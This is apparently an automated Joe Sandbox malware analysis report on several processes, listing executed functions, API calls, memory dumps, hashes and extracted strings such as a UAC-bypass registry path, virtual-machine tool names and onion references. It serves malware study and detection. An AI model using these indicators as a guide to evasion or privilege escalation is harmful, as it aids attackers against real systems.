bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
API String ID: 0-3530339137
Opcode ID: 6ddd3ac5b059c9ab672e6389908ded336cb29292fcf9e4790accb9b3f73c87e1
Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
Opcode Fuzzy Hash: 6ddd3ac5b059c9ab672e6389908ded336cb29292fcf9e4790accb9b3f73c87e1
Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: latestX.exePID: 4024, Parent PID: 5776COMMON

Executed Functions

Function 00007FF7DB3214B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2434020633.00007FF7DB321000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7DB320000, based on PE: true

Associated: 00000006.00000002.2433970017.00007FF7DB320000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2434108564.00007FF7DB340000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2434137996.00007FF7DB341000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2434877778.00007FF7DB8AF000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2434918009.00007FF7DB8B1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2434947381.00007FF7DB8BC000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2434975397.00007FF7DB8BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2435004992.00007FF7DB8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff7db320000_latestX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79f93c7cd3705f9aaf9e11784eb747df23ff89f702dc453d33123077158a3e8
Instruction ID: 276dc42202ef24943767a0b066bd8a720a8d6254cc8493be31b64c17c1015ffb
Opcode Fuzzy Hash: e79f93c7cd3705f9aaf9e11784eb747df23ff89f702dc453d33123077158a3e8
Instruction Fuzzy Hash: 54B01230D0460994F3003F19F84225C7760AB09B41FC14036C50C03372CFBC60504B70

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: toolspub2.exePID: 1020, Parent PID: 2012COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000009.00000002.2281072970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_toolspub2.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401818 Relevance: 3.0, APIs: 2, Instructions: 45
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000009.00000002.2281072970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_toolspub2.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401822 Relevance: 3.0, APIs: 2, Instructions: 44
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000009.00000002.2281072970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_toolspub2.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401826 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000009.00000002.2281072970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_toolspub2.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401834 Relevance: 3.0, APIs: 2, Instructions: 39
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000009.00000002.2281072970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_toolspub2.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: e0cbefcb1af40c7d4aff4aca26621a98.exePID: 2032, Parent PID: 3392COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	1

Executed Functions

Function 02B167C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02B167EE
Module32First.KERNEL32(00000000,00000224), ref: 02B1680E

Memory Dump Source

Source File: 00000011.00000002.4575377290.0000000002B16000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B16000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b16000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 94910a77e8a4d3f1cf712b5a4e6a61d29529de2b58fdfc8cdae07437283950ac
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: F5F096316007106FD7203FF5A88DB6E77ECEF49629F600569E642910C0DB70E8454A61

Uniqueness

Uniqueness Score: -1.00%

Function 02B16485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02B164D6

Memory Dump Source

Source File: 00000011.00000002.4575377290.0000000002B16000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B16000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b16000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 47f0dc1a3fa1ea33b61dbe6fbbf41f8dde0d291df37e39b4cc66770c286a911c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: F0113C79A00208EFDB01DF98C985E99BBF5EF08350F458094FA489B362D371EA90DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00433840 Relevance: 12.7, Strings: 10, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
%, xrefs: 00433B64
runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5

Memory Dump Source

Source File: 00000011.00000002.4560534739.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.4560534739.0000000000840000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000ACD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000C77000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000C7A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000CCF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000CD3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000CEF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000CF6000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd

Yara matches

Similarity

API ID:
String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
API String ID: 0-2845907608
Opcode ID: 4ee474e8321923de33487fdd75fee96f24fc28db05651af307a526fdfd105d7c
Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
Opcode Fuzzy Hash: 4ee474e8321923de33487fdd75fee96f24fc28db05651af307a526fdfd105d7c
Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00443890 Relevance: 5.1, Strings: 4, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B

Memory Dump Source

Source File: 00000011.00000002.4560534739.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.4560534739.0000000000840000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000ACD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000C77000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000C7A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000CCF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000CD3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000CEF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.4560534739.0000000000CF6000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd

Yara matches

Similarity

API ID:
String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
API String ID: 0-3530339137
Opcode ID: 6ddd3ac5b059c9ab672e6389908ded336cb29292fcf9e4790accb9b3f73c87e1
Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
Opcode Fuzzy Hash: 6ddd3ac5b059c9ab672e6389908ded336cb29292fcf9e4790accb9b3f73c87e1
Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 4928, Parent PID: 4004COMMON

Executed Functions

Function 00007FFD3489CB55 Relevance: .7, Instructions: 719COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc38d8c52923182ba536bd901a84a032ace2dee20ebc30902dbbdba21461fa81
Instruction ID: 4695bcc58a192a0ed70eef9f190dd4827833ad68a93b7531e15296b5dfff608e
Opcode Fuzzy Hash: cc38d8c52923182ba536bd901a84a032ace2dee20ebc30902dbbdba21461fa81
Instruction Fuzzy Hash: 4F32D630A18A498FDB98EF5CC4A5AA9BBE1FF59314F14017DD44ED7296CA35F842CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD34893E49 Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e7ed5a20b514be0ac6c2cff9678bf034f1b6e31be08b064f80f413ada0b2d7d
Instruction ID: fc5301bc0ee635c969b836e982d1da967ca53a98f1895fef98b3c52148f0dbf4
Opcode Fuzzy Hash: 8e7ed5a20b514be0ac6c2cff9678bf034f1b6e31be08b064f80f413ada0b2d7d
Instruction Fuzzy Hash: DEF1A331A0CA4D8FDF98DF5CD4A5AE97BE1FF69300F14416AD449D7296CA38E882C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489DC35 Relevance: .5, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172a9c1a1569b9cf1dbb3c1af37a60dd34adb0fc83656810b6b4bf9160d41b02
Instruction ID: f6cd6ff1fcc6ed2878d37d80fb5ea6d65bb5731a1ea86620801d4f21566c061d
Opcode Fuzzy Hash: 172a9c1a1569b9cf1dbb3c1af37a60dd34adb0fc83656810b6b4bf9160d41b02
Instruction Fuzzy Hash: 1AE19330A08A4D8FDF94EF58C495AE97BE1FF69314F1441AAD40DD7296DA38EC42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489361A Relevance: .5, Instructions: 467COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a8473b25f2966e9c8ec96dbfcf970f81f2253cc63b01de6a13e8f8dceee47a
Instruction ID: be7ae23c2d0eb742d38a77571280fb9ec4d42ae47de808000f25200e16cd6555
Opcode Fuzzy Hash: d9a8473b25f2966e9c8ec96dbfcf970f81f2253cc63b01de6a13e8f8dceee47a
Instruction Fuzzy Hash: 60E1B371A0CE4E8FDF95DF58C4A5AA9BBE1FF5A304F1401B9D009D7286DA38E846D780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD34897583 Relevance: .4, Instructions: 360COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67333d6dd0162b19a6c170ea8aafb22cfd3a952c5b0b559e268326e3d99e2f75
Instruction ID: d7a1e99e1bce1d79ea7b7982406023b86cdf36079cde383af476b32b9c0e2e5e
Opcode Fuzzy Hash: 67333d6dd0162b19a6c170ea8aafb22cfd3a952c5b0b559e268326e3d99e2f75
Instruction Fuzzy Hash: 66C13C31A18A4D8FDF95EF5CD4A5AE97BE1FFA9300F14416AD409D7295CB38E881CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD34964943 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2405197291.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de7a887fd24565ebfb6b7409f3f48d314341a4aed3c124526a06b4e85118445
Instruction ID: fe01195516d824cc71b690222ea9d1533bbfa700d3df518f86c8df46e1ea869b
Opcode Fuzzy Hash: 2de7a887fd24565ebfb6b7409f3f48d314341a4aed3c124526a06b4e85118445
Instruction Fuzzy Hash: 6F513822B0DA468FEBA9DA5C54B11B477D2EF96230B5800BFC25EC7197DE1CEC058359

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489A0E5 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e48b26a78407d7d12aa1e21ef8e4f67bef2bfc53f6ba0b8fa22060f3992c208
Instruction ID: 1d67cea7623b2511cd2c9d80a08de13d4e8d9550d673aea507a88136f15f82e6
Opcode Fuzzy Hash: 0e48b26a78407d7d12aa1e21ef8e4f67bef2bfc53f6ba0b8fa22060f3992c208
Instruction Fuzzy Hash: CD31143191CB888FDB18DB5C9C4A6A97BE0FB69320F00426FE449D3252DA74A855CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3477ED40 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2402980991.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd3477d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f396d30d3a08ca07c7b03d182df04115b43983c4a5f9d4712e4e24b48190fbc9
Instruction ID: 225eb2dccf21024d17ec0a5d8ba92b36020353a9387507fbc6b31d5a87017324
Opcode Fuzzy Hash: f396d30d3a08ca07c7b03d182df04115b43983c4a5f9d4712e4e24b48190fbc9
Instruction Fuzzy Hash: C541267040DBC48FE7568B289C919623FF0EF57320B1945DFD088CB1A3D629B846C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489DC7C Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b7cecfab0a6b5d54ef97624d38efbeeb71624213e902e0362dbbb905335f10
Instruction ID: 0a3cb2b930fb97b33ba848e52e2886bc0001c81f58a7a73e79f183c31481bc79
Opcode Fuzzy Hash: b8b7cecfab0a6b5d54ef97624d38efbeeb71624213e902e0362dbbb905335f10
Instruction Fuzzy Hash: CF21F13170C9095FEB4CEA1CD8A99B537D0EBAA314B1001AEE44DC7252DD26FC83C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489B028 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2973ab7cbdd82c847d1c72318bc0482d6615c63ffd76cc4cc56ba9348c435dd
